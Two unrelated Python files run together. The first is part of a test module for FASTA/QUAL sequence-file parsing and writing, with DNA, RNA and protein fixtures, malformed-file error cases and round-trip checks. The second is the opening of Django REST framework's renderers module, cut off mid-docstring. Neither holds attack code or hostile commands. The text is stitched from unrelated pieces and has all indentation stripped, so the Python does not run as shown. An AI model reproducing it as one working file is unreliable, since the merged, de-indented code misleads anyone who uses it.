# also test that fasta and qual headers do not need to match
# exactly, only that they need to match exactly after parsing (e.g.,
# after stripping leading/trailing whitespace from descriptions)
self.odd_labels_different_type = (
[Protein('DEFQfp',
metadata={'id': '', 'description': ''},
positional_metadata={'quality':
np.asarray([0, 0, 1, 5, 44, 0],
dtype=np.uint8)},
validate=False),
Protein(
'SKBI', metadata={'id': '', 'description': 'skbio'},
positional_metadata={'quality':
np.asarray([1, 2, 33, 123],
dtype=np.uint8)})],
{'constructor': partial(Protein, validate=False)},
list(map(get_data_path, ['fasta_prot_seqs_odd_labels'])),
list(map(get_data_path, ['qual_prot_seqs_odd_labels']))
)
# sequences that can be loaded into a SequenceCollection or Alignment.
# they are also a different type than Sequence in order to
# exercise the constructor parameter
self.sequence_collection_different_type = (
[RNA('aUG',
metadata={'id': '', 'description': ''},
positional_metadata={'quality':
np.asarray([20, 20, 21],
dtype=np.uint8)},
lowercase='introns'),
RNA('AuC',
metadata={'id': 'rnaseq-1', 'description': 'rnaseq desc 1'},
positional_metadata={'quality':
np.asarray([10, 9, 10], dtype=np.uint8)},
lowercase='introns'),
RNA('AUg',
metadata={'id': 'rnaseq-2', 'description': 'rnaseq desc 2'},
positional_metadata={'quality':
np.asarray([9, 99, 99], dtype=np.uint8)},
lowercase='introns')],
{'constructor': partial(RNA, lowercase='introns')},
list(map(get_data_path,
['fasta_sequence_collection_different_type'])),
list(map(get_data_path,
['qual_sequence_collection_different_type']))
)
self.lowercase_seqs = (
[DNA('TAcg',
metadata={'id': 'f-o-o', 'description': 'b_a_r'},
positional_metadata={'quality':
np.asarray([0, 1, 2, 3],
dtype=np.uint8)},
lowercase='introns')],
{'constructor': DNA, 'lowercase': 'introns'},
list(map(get_data_path,
['fasta_single_dna_seq_non_defaults'])),
list(map(get_data_path,
['qual_single_dna_seq_non_defaults']))
)
# store fasta filepath, kwargs, error type, and expected error message
# for invalid input.
#
# note: there is some duplication in testing that fasta and qual
# parsers raise expected errors. even though the parsers share the same
# underlying logic, these tests are here as a safeguard in case the
# code is refactored in the future such that fasta and qual have
# different implementations (e.g., if qual is written in cython while
# fasta remains in python)
self.invalid_fps = list(map(lambda e: (get_data_path(e[0]),
e[1], e[2], e[3]), [
# fasta and qual missing header
('fasta_invalid_missing_header', {}, FASTAFormatError,
'non-header.*1st'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_missing_header')},
QUALFormatError, 'non-header.*1st'),
# fasta and qual with blank line within sequence
('fasta_invalid_blank_line_within_sequence', {}, FASTAFormatError,
'whitespace-only'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_blank_line_within_seq')},
QUALFormatError, 'whitespace-only'),
# fasta and qual with blank after header
('fasta_invalid_blank_sequence', {}, FASTAFormatError,
'without sequence data'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_blank_sequence')},
QUALFormatError, 'without quality scores'),
# fasta and qual with whitespace only sequence
('fasta_invalid_whitespace_only_sequence', {}, FASTAFormatError,
'without sequence data'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_whitespace_only_sequence')},
QUALFormatError, 'without quality scores'),
# fasta and qual with blank line within sequence
('fasta_invalid_blank_line_after_header', {}, FASTAFormatError,
'whitespace-only'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_blank_line_after_header')},
QUALFormatError, 'whitespace-only'),
# fasta and qual with whitespace-only line within sequence
('fasta_invalid_whitespace_only_line_within_sequence',
{}, FASTAFormatError, 'whitespace-only'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_whitespace_line_in_seq')},
QUALFormatError, 'whitespace-only'),
# fasta and qual with whitespace-only line after header
('fasta_invalid_whitespace_line_after_header',
{}, FASTAFormatError, 'whitespace-only'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_ws_line_after_header')},
QUALFormatError, 'whitespace-only'),
# fasta and qual missing record data (first record)
('fasta_invalid_missing_seq_data_first', {}, FASTAFormatError,
'without sequence data'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_missing_qual_scores_first')},
QUALFormatError, 'without quality scores'),
# fasta and qual missing record data (middle record)
('fasta_invalid_missing_seq_data_middle', {}, FASTAFormatError,
'without sequence data'),
('fasta_3_seqs_defaults',
{'qual':
get_data_path('qual_invalid_missing_qual_scores_middle')},
QUALFormatError, 'without quality scores'),
# fasta and qual missing record data (last record)
('fasta_invalid_missing_seq_data_last', {}, FASTAFormatError,
'without sequence data'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_missing_qual_scores_last')},
QUALFormatError, 'without quality scores'),
# fasta and qual in legacy format (;)
('fasta_invalid_legacy_format', {}, FASTAFormatError,
'non-header.*1st'),
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_legacy_format')},
QUALFormatError, 'non-header.*1st'),
# qual file with an extra record
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_3_seqs_defaults_extra')},
FASTAFormatError, 'QUAL file has more'),
# fasta file with an extra record
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_2_seqs_defaults')},
FASTAFormatError, 'FASTA file has more'),
# id mismatch between fasta and qual
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_3_seqs_defaults_id_mismatch')},
FASTAFormatError,
'IDs do not match.*\'s_e_q_2\' != \'s_e_q_42\''),
# description mismatch between fasta and qual
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_3_seqs_defaults_desc_mismatch')},
FASTAFormatError,
'Descriptions do not match.*\'desc 2\' != \'desc 42\''),
# sequence and quality score length mismatch between fasta and qual
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_3_seqs_defaults_length_mismatch')},
ValueError,
'Number of positional metadata values \(3\) must match the '
'number of characters in the sequence \(4\)\.'),
# invalid qual scores (string value can't be converted to integer)
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_qual_scores_string')},
QUALFormatError,
'quality scores to integers:\n100 0 1a -42'),
# invalid qual scores (float value can't be converted to integer)
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_qual_scores_float')},
QUALFormatError,
'quality scores to integers:\n42 41.0 39 40'),
# invalid qual scores (negative integer)
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_qual_scores_negative')},
QUALFormatError,
'Quality scores must be greater than or equal to zero\.'),
# invalid qual scores (over 255)
('fasta_3_seqs_defaults',
{'qual': get_data_path('qual_invalid_qual_scores_over_255')},
QUALFormatError,
'quality score\(s\) greater than 255'),
# misc. invalid files used elsewhere in the tests
('fasta_invalid_after_10_seqs', {}, FASTAFormatError,
'without sequence data'),
('fasta_id_whitespace_replacement_none', {}, FASTAFormatError,
'whitespace-only'),
('fasta_description_newline_replacement_none', {},
FASTAFormatError, 'whitespace-only')
]))
# extensive tests for fasta -> generator reader since it is used by all
# other fasta -> object readers
def test_fasta_to_generator_valid_files(self):
test_cases = (self.empty, self.single, self.multi,
self.odd_labels_different_type,
self.sequence_collection_different_type,
self.lowercase_seqs)
# Strategy:
# for each fasta file, read it without its corresponding qual file,
# and ensure observed vs. expected match, ignoring quality scores in
# expected. next, parse the current fasta file with each
# corresponding quality file and ensure that observed vs. expected
# match, this time taking quality scores into account. this
# sufficiently exercises parsing a standalone fasta file and paired
# fasta/qual files
for exp, kwargs, fasta_fps, qual_fps in test_cases:
for fasta_fp in fasta_fps:
obs = list(_fasta_to_generator(fasta_fp, **kwargs))
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
e = e.copy()
del e.positional_metadata['quality']
self.assertEqual(o, e)
for qual_fp in qual_fps:
obs = list(_fasta_to_generator(fasta_fp, qual=qual_fp,
**kwargs))
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
self.assertEqual(o, e)
def test_fasta_to_generator_invalid_files(self):
for fp, kwargs, error_type, error_msg_regex in self.invalid_fps:
with six.assertRaisesRegex(self, error_type, error_msg_regex):
list(_fasta_to_generator(fp, **kwargs))
# light testing of fasta -> object readers to ensure interface is present
# and kwargs are passed through. extensive testing of underlying reader is
# performed above
def test_fasta_to_any_sequence(self):
for constructor, reader_fn in ((Sequence,
_fasta_to_biological_sequence),
(partial(DNA, validate=False,
lowercase='introns'),
partial(_fasta_to_dna_sequence,
validate=False,
lowercase='introns')),
(partial(RNA, validate=False,
lowercase='introns'),
partial(_fasta_to_rna_sequence,
validate=False,
lowercase='introns')),
(partial(Protein, lowercase='introns'),
partial(_fasta_to_protein_sequence,
validate=False,
lowercase='introns'))):
# empty file
empty_fp = get_data_path('empty')
with six.assertRaisesRegex(self, ValueError, '1st sequence'):
reader_fn(empty_fp)
with six.assertRaisesRegex(self, ValueError, '1st sequence'):
reader_fn(empty_fp, qual=empty_fp)
# the sequences in the following files don't necessarily make sense
# for each of the sequence object types that they're read into
# (e.g., reading a protein sequence into a dna sequence object).
# however, for the purposes of testing the various
# fasta -> sequence readers, this works out okay as it is valid to
# construct a sequence object with invalid characters. we're
# interested in testing the reading logic here, and don't care so
# much about constructing semantically-meaningful/valid sequence
# objects
# file with only 1 seq, get first
fasta_fps = list(map(get_data_path,
['fasta_single_seq', 'fasta_max_width_1']))
for fasta_fp in fasta_fps:
exp = constructor(
'ACGT-acgt.',
metadata={'id': 'seq1', 'description': 'desc1'})
obs = reader_fn(fasta_fp)
self.assertEqual(obs, exp)
exp.positional_metadata.insert(
0, 'quality',
np.asarray([10, 20, 30, 10, 0, 0, 0, 255, 1, 255],
dtype=np.uint8))
qual_fps = list(map(get_data_path,
['qual_single_seq', 'qual_max_width_1']))
for qual_fp in qual_fps:
obs = reader_fn(fasta_fp, qual=qual_fp)
self.assertEqual(obs, exp)
# file with multiple seqs
fasta_fps = list(map(get_data_path,
['fasta_multi_seq', 'fasta_max_width_5']))
qual_fps = list(map(get_data_path,
['qual_multi_seq', 'qual_max_width_5']))
for fasta_fp in fasta_fps:
# get first
exp = constructor(
'ACGT-acgt.',
metadata={'id': 'seq1', 'description': 'desc1'})
obs = reader_fn(fasta_fp)
self.assertEqual(obs, exp)
exp.positional_metadata.insert(
0, 'quality',
np.asarray([10, 20, 30, 10, 0, 0, 0, 255, 1, 255],
dtype=np.uint8))
for qual_fp in qual_fps:
obs = reader_fn(fasta_fp, qual=qual_fp)
self.assertEqual(obs, exp)
# get middle
exp = constructor('ACGTTGCAccGG',
metadata={'id': '', 'description': ''})
obs = reader_fn(fasta_fp, seq_num=4)
self.assertEqual(obs, exp)
exp.positional_metadata.insert(
0, 'quality',
np.asarray([55, 10, 0, 99, 1, 1, 8, 77, 40, 10, 10, 0],
dtype=np.uint8))
for qual_fp in qual_fps:
obs = reader_fn(fasta_fp, seq_num=4, qual=qual_fp)
self.assertEqual(obs, exp)
# get last
exp = constructor(
'pQqqqPPQQQ',
metadata={'id': 'proteinseq',
'description':
'detailed description \t\twith new lines'})
obs = reader_fn(fasta_fp, seq_num=6)
self.assertEqual(obs, exp)
exp.positional_metadata.insert(
0, 'quality',
np.asarray([42, 42, 255, 255, 42, 42, 42, 42, 42, 43],
dtype=np.uint8))
for qual_fp in qual_fps:
obs = reader_fn(fasta_fp, seq_num=6, qual=qual_fp)
self.assertEqual(obs, exp)
# seq_num too large
with six.assertRaisesRegex(self, ValueError, '8th sequence'):
reader_fn(fasta_fp, seq_num=8)
for qual_fp in qual_fps:
with six.assertRaisesRegex(self, ValueError,
'8th sequence'):
reader_fn(fasta_fp, seq_num=8, qual=qual_fp)
# seq_num too small
with six.assertRaisesRegex(self, ValueError, '`seq_num`=0'):
reader_fn(fasta_fp, seq_num=0)
for qual_fp in qual_fps:
with six.assertRaisesRegex(self, ValueError,
'`seq_num`=0'):
reader_fn(fasta_fp, seq_num=0, qual=qual_fp)
def test_fasta_to_sequence_collection_and_alignment(self):
test_cases = (self.empty, self.single,
self.sequence_collection_different_type,
self.lowercase_seqs)
for constructor, reader_fn in ((SequenceCollection,
_fasta_to_sequence_collection),
(Alignment,
_fasta_to_alignment)):
# see comment in test_fasta_to_generator_valid_files (above) for
# testing strategy
for exp_list, kwargs, fasta_fps, qual_fps in test_cases:
exp = constructor(exp_list)
for fasta_fp in fasta_fps:
obs = reader_fn(fasta_fp, **kwargs)
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
e = e.copy()
del e.positional_metadata['quality']
self.assertEqual(o, e)
for qual_fp in qual_fps:
obs = reader_fn(fasta_fp, qual=qual_fp, **kwargs)
self.assertEqual(obs, exp)
class WriterTests(TestCase):
def setUp(self):
self.bio_seq1 = DNA(
'ACGT-acgt.',
metadata={'id': 'seq1', 'description': 'desc1'},
positional_metadata={'quality': [10, 20, 30, 10, 0, 0, 0, 255,
1, 255]},
lowercase='introns')
self.bio_seq2 = DNA(
'A',
metadata={'id': ' \n \nseq \t2 '},
positional_metadata={'quality': [42]},
lowercase='introns')
self.bio_seq3 = RNA(
'AACGGuA',
metadata={'description': 'desc3'},
positional_metadata={'quality': [0, 0, 0, 0, 0, 0, 0]},
lowercase='introns')
self.dna_seq = DNA(
'ACGTTGCAccGG',
positional_metadata={'quality': [55, 10, 0, 99, 1, 1, 8, 77, 40,
10, 10, 0]},
lowercase='introns')
self.rna_seq = RNA('ACGUU',
positional_metadata={'quality': [10, 9, 8, 7, 6]},
lowercase='introns')
self.prot_seq = Protein(
'pQqqqPPQQQ',
metadata={'id': 'proteinseq',
'description': "\ndetailed\ndescription \t\twith "
" new\n\nlines\n\n\n"},
positional_metadata={'quality': [42, 42, 255, 255, 42, 42, 42, 42,
42, 43]},
lowercase='introns')
seqs = [
RNA('UUUU',
metadata={'id': 's\te\tq\t1', 'description': 'desc\n1'},
positional_metadata={'quality': [1234, 0, 0, 2]},
lowercase='introns'),
Sequence(
'CATC',
metadata={'id': 's\te\tq\t2', 'description': 'desc\n2'},
positional_metadata={'quality': [1, 11, 111, 11112]}),
Protein('sits',
metadata={'id': 's\te\tq\t3', 'description': 'desc\n3'},
positional_metadata={'quality': [12345, 678909, 999999,
4242424242]},
validate=False)
]
self.seq_coll = SequenceCollection(seqs)
self.align = Alignment(seqs)
def empty_gen():
raise StopIteration()
yield
def single_seq_gen():
yield self.bio_seq1
# generate sequences with descriptions containing newlines (to test
# description_newline_replacement)
def newline_description_gen():
yield self.prot_seq
yield DNA('AGGAGAATA',
metadata={'id': 'foo', 'description': '\n\n\n\n'},
positional_metadata={'quality': range(9)},
lowercase='introns')
# generate sequences with ids containing whitespace (to test
# id_whitespace_replacement)
def whitespace_id_gen():
yield self.bio_seq2
yield RNA('UA', metadata={'id': '\n\t \t', 'description': 'a\nb'},
positional_metadata={'quality': [1000, 1]})
# multiple sequences of mixed types, lengths, and metadata. lengths are
# chosen to exercise various splitting cases when testing max_width,
# including exercising the different splitting algorithms used for
# sequence data vs. quality scores
def multi_seq_gen():
for seq in (self.bio_seq1, self.bio_seq2, self.bio_seq3,
self.dna_seq, self.rna_seq, self.prot_seq):
yield seq
# can be serialized if no qual file is provided, else it should raise
# an error because one seq has qual scores and the other doesn't
def mixed_qual_score_gen():
missing_qual_seq = DNA(
'AAAAT', metadata={'id': 'da,dadadada',
'description': '10 hours'},
lowercase='introns')
for seq in self.bio_seq1, missing_qual_seq:
yield seq
self.mixed_qual_score_gen = mixed_qual_score_gen()
# store sequence generator to serialize, writer kwargs (if any), and
# fasta and qual filepaths of expected results
self.objs_fps = list(map(lambda e: (e[0], e[1], get_data_path(e[2]),
get_data_path(e[3])), [
(empty_gen(), {}, 'empty', 'empty'),
(single_seq_gen(), {'lowercase': 'introns'}, 'fasta_single_seq',
'qual_single_seq'),
# no splitting of sequence or qual data across lines b/c max_width
# is sufficiently large
(single_seq_gen(), {'max_width': 32, 'lowercase': 'introns'},
'fasta_single_seq',
'qual_single_seq'),
# splitting algorithm for sequence and qual scores is different;
# make sure individual qual scores aren't split across lines even
# if they exceed max_width
(single_seq_gen(), {'max_width': 1, 'lowercase': 'introns'},
'fasta_max_width_1',
'qual_max_width_1'),
(multi_seq_gen(),
{'lowercase': 'introns'}, 'fasta_multi_seq', 'qual_multi_seq'),
(multi_seq_gen(),
{'max_width': 5, 'lowercase': 'introns'}, 'fasta_max_width_5',
'qual_max_width_5'),
(newline_description_gen(),
{'description_newline_replacement': ':-)',
'lowercase': 'introns'},
'fasta_description_newline_replacement_multi_char',
'qual_description_newline_replacement_multi_char'),
(newline_description_gen(),
{'description_newline_replacement': '',
'lowercase': 'introns'},
'fasta_description_newline_replacement_empty_str',
'qual_description_newline_replacement_empty_str',),
(newline_description_gen(),
{'description_newline_replacement': None,
'lowercase': 'introns'},
'fasta_description_newline_replacement_none',
'qual_description_newline_replacement_none'),
(whitespace_id_gen(),
{'id_whitespace_replacement': '>:o'},
'fasta_id_whitespace_replacement_multi_char',
'qual_id_whitespace_replacement_multi_char'),
(whitespace_id_gen(),
{'id_whitespace_replacement': ''},
'fasta_id_whitespace_replacement_empty_str',
'qual_id_whitespace_replacement_empty_str'),
(whitespace_id_gen(),
{'id_whitespace_replacement': None},
'fasta_id_whitespace_replacement_none',
'qual_id_whitespace_replacement_none'),
]))
def blank_seq_gen():
for seq in self.bio_seq1, Sequence(''):
yield seq
# generators or parameter combos that cannot be written in fasta
# format, paired with kwargs (if any), error type, and expected error
# message regexp
self.invalid_objs = [
(blank_seq_gen(), {}, ValueError, '2nd.*empty'),
(single_seq_gen(),
{'max_width': 0}, ValueError, 'max_width=0'),
(multi_seq_gen(), {'id_whitespace_replacement': '-\n_'},
ValueError, 'Newline character'),
(multi_seq_gen(), {'description_newline_replacement': '-.-\n'},
ValueError, 'Newline character'),
(mixed_qual_score_gen(), {'qual': io.StringIO()}, ValueError,
'2nd sequence.*does not have quality scores')
]
# extensive tests for generator -> fasta writer since it is used by all
# other object -> fasta writers
def test_generator_to_fasta_no_qual(self):
# test writing standalone fasta (i.e., without a qual file)
for obj, kwargs, fp, _ in self.objs_fps:
fh = io.StringIO()
_generator_to_fasta(obj, fh, **kwargs)
obs = fh.getvalue()
fh.close()
with io.open(fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_generator_to_fasta_mixed_qual_scores(self):
# test writing some sequences with qual scores and some without is
# possible if no qual output file is specified
fh = io.StringIO()
_generator_to_fasta(self.mixed_qual_score_gen, fh, lowercase='introns')
obs = fh.getvalue()
fh.close()
with io.open(get_data_path('fasta_mixed_qual_scores')) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_generator_to_fasta_with_qual(self):
# test writing fasta and qual files
for obj, kwargs, fasta_fp, qual_fp in self.objs_fps:
if qual_fp is not None:
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
_generator_to_fasta(obj, fasta_fh, qual=qual_fh, **kwargs)
obs_fasta = fasta_fh.getvalue()
obs_qual = qual_fh.getvalue()
fasta_fh.close()
qual_fh.close()
with io.open(fasta_fp) as fh:
exp_fasta = fh.read()
with io.open(qual_fp) as fh:
exp_qual = fh.read()
self.assertEqual(obs_fasta, exp_fasta)
self.assertEqual(obs_qual, exp_qual)
def test_generator_to_fasta_invalid_input(self):
for obj, kwargs, error_type, error_msg_regexp in self.invalid_objs:
fh = io.StringIO()
with six.assertRaisesRegex(self, error_type, error_msg_regexp):
_generator_to_fasta(obj, fh, **kwargs)
fh.close()
def test_generator_to_fasta_sequence_lowercase_exception(self):
seq = Sequence('ACgt', metadata={'id': ''})
fh = io.StringIO()
with six.assertRaisesRegex(self, AttributeError,
"lowercase specified but class Sequence "
"does not support lowercase "
"functionality"):
_generator_to_fasta(SequenceCollection([seq]), fh,
lowercase='introns')
fh.close()
# light testing of object -> fasta writers to ensure interface is present
# and kwargs are passed through. extensive testing of underlying writer is
# performed above
def test_any_sequence_to_fasta(self):
# store writer function, sequence object to write, expected
# fasta filepath for default parameters, expected fasta filepath for
# non-defaults, and expected qual filepath for non-defaults
id_ = 'f o o'
desc = 'b\na\nr'
test_data = (
(_biological_sequence_to_fasta,
Sequence('ACgt', metadata={'id': id_, 'description': desc},
positional_metadata={'quality': range(1, 5)}),
('fasta_single_bio_seq_defaults',
'fasta_single_bio_seq_non_defaults',
'qual_single_bio_seq_non_defaults')),
(partial(_dna_sequence_to_fasta, lowercase='introns'),
DNA('TAcg', metadata={'id': id_, 'description': desc},
positional_metadata={'quality': range(4)},
lowercase='introns'),
('fasta_single_dna_seq_defaults',
'fasta_single_dna_seq_non_defaults',
'qual_single_dna_seq_non_defaults')),
(partial(_rna_sequence_to_fasta, lowercase='introns'),
RNA('uaCG', metadata={'id': id_, 'description': desc},
positional_metadata={'quality': range(2, 6)},
lowercase='introns'),
('fasta_single_rna_seq_defaults',
'fasta_single_rna_seq_non_defaults',
'qual_single_rna_seq_non_defaults')),
(partial(_protein_sequence_to_fasta, lowercase='introns'),
Protein('PqQ', metadata={'id': id_, 'description': desc},
positional_metadata={'quality': [42, 41, 40]},
lowercase='introns'),
('fasta_single_prot_seq_defaults',
'fasta_single_prot_seq_non_defaults',
'qual_single_prot_seq_non_defaults')))
for fn, obj, fps in test_data:
defaults_fp, non_defaults_fasta_fp, non_defaults_qual_fp = fps
# test writing with default parameters
fh = io.StringIO()
fn(obj, fh)
obs = fh.getvalue()
fh.close()
with io.open(get_data_path(defaults_fp)) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
# test writing with non-defaults
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
fn(obj, fasta_fh, id_whitespace_replacement='-',
description_newline_replacement='_', max_width=1, qual=qual_fh)
obs_fasta = fasta_fh.getvalue()
obs_qual = qual_fh.getvalue()
fasta_fh.close()
qual_fh.close()
with io.open(get_data_path(non_defaults_fasta_fp)) as fh:
exp_fasta = fh.read()
with io.open(get_data_path(non_defaults_qual_fp)) as fh:
exp_qual = fh.read()
self.assertEqual(obs_fasta, exp_fasta)
self.assertEqual(obs_qual, exp_qual)
def test_any_sequences_to_fasta(self):
for fn, obj in ((_sequence_collection_to_fasta, self.seq_coll),
(_alignment_to_fasta, self.align)):
# test writing with default parameters
fh = io.StringIO()
fn(obj, fh)
obs = fh.getvalue()
fh.close()
with io.open(get_data_path('fasta_3_seqs_defaults')) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
# test writing with non-defaults
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
fn(obj, fasta_fh, id_whitespace_replacement='*',
description_newline_replacement='+', max_width=3, qual=qual_fh)
obs_fasta = fasta_fh.getvalue()
obs_qual = qual_fh.getvalue()
fasta_fh.close()
qual_fh.close()
with io.open(get_data_path('fasta_3_seqs_non_defaults')) as fh:
exp_fasta = fh.read()
with io.open(get_data_path('qual_3_seqs_non_defaults')) as fh:
exp_qual = fh.read()
self.assertEqual(obs_fasta, exp_fasta)
self.assertEqual(obs_qual, exp_qual)
fh2 = io.StringIO()
with six.assertRaisesRegex(self, AttributeError,
"lowercase specified but class "
"Sequence does not support lowercase "
"functionality"):
fn(obj, fh2, lowercase='introns')
fh2.close()
fasta_fh2 = io.StringIO()
qual_fh2 = io.StringIO()
with six.assertRaisesRegex(self, AttributeError,
"lowercase specified but class "
"Sequence does not support lowercase "
"functionality"):
fn(obj, fasta_fh2, id_whitespace_replacement='*',
description_newline_replacement='+', max_width=3,
qual=qual_fh2, lowercase='introns')
fasta_fh2.close()
qual_fh2.close()
class RoundtripTests(TestCase):
def test_roundtrip_generators(self):
# test that fasta and qual files can be streamed into memory and back
# out to disk using generator reader and writer
fps = list(map(lambda e: list(map(get_data_path, e)),
[('empty', 'empty'),
('fasta_multi_seq_roundtrip',
'qual_multi_seq_roundtrip')]))
for fasta_fp, qual_fp in fps:
with io.open(fasta_fp) as fh:
exp_fasta = fh.read()
with io.open(qual_fp) as fh:
exp_qual = fh.read()
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
_generator_to_fasta(_fasta_to_generator(fasta_fp, qual=qual_fp),
fasta_fh, qual=qual_fh)
obs_fasta = fasta_fh.getvalue()
obs_qual = qual_fh.getvalue()
fasta_fh.close()
qual_fh.close()
self.assertEqual(obs_fasta, exp_fasta)
self.assertEqual(obs_qual, exp_qual)
def test_roundtrip_sequence_collections_and_alignments(self):
fps = list(map(lambda e: list(map(get_data_path, e)),
[('empty', 'empty'),
('fasta_sequence_collection_different_type',
'qual_sequence_collection_different_type')]))
for reader, writer in ((_fasta_to_sequence_collection,
_sequence_collection_to_fasta),
(_fasta_to_alignment,
_alignment_to_fasta)):
for fasta_fp, qual_fp in fps:
# read
obj1 = reader(fasta_fp, qual=qual_fp)
# write
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
writer(obj1, fasta_fh, qual=qual_fh)
fasta_fh.seek(0)
qual_fh.seek(0)
# read
obj2 = reader(fasta_fh, qual=qual_fh)
fasta_fh.close()
qual_fh.close()
self.assertEqual(obj1, obj2)
def test_roundtrip_biological_sequences(self):
fps = list(map(lambda e: list(map(get_data_path, e)),
[('fasta_multi_seq_roundtrip',
'qual_multi_seq_roundtrip'),
('fasta_sequence_collection_different_type',
'qual_sequence_collection_different_type')]))
for reader, writer in ((_fasta_to_biological_sequence,
_biological_sequence_to_fasta),
(partial(_fasta_to_dna_sequence,
validate=False),
_dna_sequence_to_fasta),
(partial(_fasta_to_rna_sequence,
validate=False),
_rna_sequence_to_fasta),
(partial(_fasta_to_protein_sequence,
validate=False),
_protein_sequence_to_fasta)):
for fasta_fp, qual_fp in fps:
# read
obj1 = reader(fasta_fp, qual=qual_fp)
# write
fasta_fh = io.StringIO()
qual_fh = io.StringIO()
writer(obj1, fasta_fh, qual=qual_fh)
fasta_fh.seek(0)
qual_fh.seek(0)
# read
obj2 = reader(fasta_fh, qual=qual_fh)
fasta_fh.close()
qual_fh.close()
self.assertEqual(obj1, obj2)
if __name__ == '__main__':
main()
| |
"""
Renderers are used to serialize a response into specific media types.
They give us a generic way of being able to handle various media types
on the response, such as JSON encoded data or HTML output.
REST framework also provides an HTML renderer the renders the browsable API.
"""
from __future__ import unicode_literals
import json
import django
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.core.paginator import Page
from django.http.multipartparser import parse_header
from django.template import Context, RequestContext, loader, Template
from django.test.client import encode_multipart
from django.utils import six
from django.utils.encoding import smart_text
from django.utils.xmlutils import SimplerXMLGenerator
from django.utils.six.moves import StringIO
from rest_framework import exceptions, serializers, status, VERSION
from rest_framework.compat import SHORT_SEPARATORS, LONG_SEPARATORS, yaml
from rest_framework.exceptions import ParseError
from rest_framework.settings import api_settings
from rest_framework.request import is_form_media_type, override_method
from rest_framework.utils import encoders
from rest_framework.utils.breadcrumbs import get_breadcrumbs
from rest_framework.utils.field_mapping import ClassLookupDict
def zero_as_none(value):
return None if value == 0 else value
class BaseRenderer(object):
"""
All renderers should extend this class, setting the `media_type`
and `format` attributes, and override the `.render()` method.
"""
media_type = None
format = None
charset = 'utf-8'
render_style = 'text'
def render(self, data, accepted_media_type=None, renderer_context=None):
raise NotImplementedError('Renderer class requires .render() to be implemented')
class JSONRenderer(BaseRenderer):
"""
Renderer which serializes to JSON.
"""
media_type = 'application/json'
format = 'json'
encoder_class = encoders.JSONEncoder
ensure_ascii = not api_settings.UNICODE_JSON
compact = api_settings.COMPACT_JSON
# We don't set a charset because JSON is a binary encoding,
# that can be encoded as utf-8, utf-16 or utf-32.
# See: http://www.ietf.org/rfc/rfc4627.txt
# Also: http://lucumr.pocoo.org/2013/7/19/application-mimetypes-and-encodings/
charset = None
def get_indent(self, accepted_media_type, renderer_context):
if accepted_media_type:
# If the media type looks like 'application/json; indent=4',
# then pretty print the result.
# Note that we coerce `indent=0` into `indent=None`.
base_media_type, params = parse_header(accepted_media_type.encode('ascii'))
try:
return zero_as_none(max(min(int(params['indent']), 8), 0))
except (KeyError, ValueError, TypeError):
pass
# If 'indent' is provided in the context, then pretty print the result.
# E.g. If we're being called by the BrowsableAPIRenderer.
return renderer_context.get('indent', None)
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Render `data` into JSON, returning a bytestring.
"""
if data is None:
return bytes()
renderer_context = renderer_context or {}
indent = self.get_indent(accepted_media_type, renderer_context)
separators = SHORT_SEPARATORS if (indent is None and self.compact) else LONG_SEPARATORS
ret = json.dumps(
data, cls=self.encoder_class,
indent=indent, ensure_ascii=self.ensure_ascii,
separators=separators
)
# On python 2.x json.dumps() returns bytestrings if ensure_ascii=True,
# but if ensure_ascii=False, the return type is underspecified,
# and may (or may not) be unicode.
# On python 3.x json.dumps() returns unicode strings.
if isinstance(ret, six.text_type):
# We always fully escape \u2028 and \u2029 to ensure we output JSON
# that is a strict javascript subset. If bytes were returned
# by json.dumps() then we don't have these characters in any case.
# See: http://timelessrepo.com/json-isnt-a-javascript-subset
ret = ret.replace('\u2028', '\\u2028').replace('\u2029', '\\u2029')
return bytes(ret.encode('utf-8'))
return ret
class JSONPRenderer(JSONRenderer):
"""
Renderer which serializes to json,
wrapping the json output in a callback function.
"""
media_type = 'application/javascript'
format = 'jsonp'
callback_parameter = 'callback'
default_callback = 'callback'
charset = 'utf-8'
def get_callback(self, renderer_context):
"""
Determine the name of the callback to wrap around the json output.
"""
request = renderer_context.get('request', None)
params = request and request.query_params or {}
return params.get(self.callback_parameter, self.default_callback)
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Renders into jsonp, wrapping the json output in a callback function.
Clients may set the callback function name using a query parameter
on the URL, for example: ?callback=exampleCallbackName
"""
renderer_context = renderer_context or {}
callback = self.get_callback(renderer_context)
json = super(JSONPRenderer, self).render(data, accepted_media_type,
renderer_context)
return callback.encode(self.charset) + b'(' + json + b');'
class XMLRenderer(BaseRenderer):
"""
Renderer which serializes to XML.
"""
media_type = 'application/xml'
format = 'xml'
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
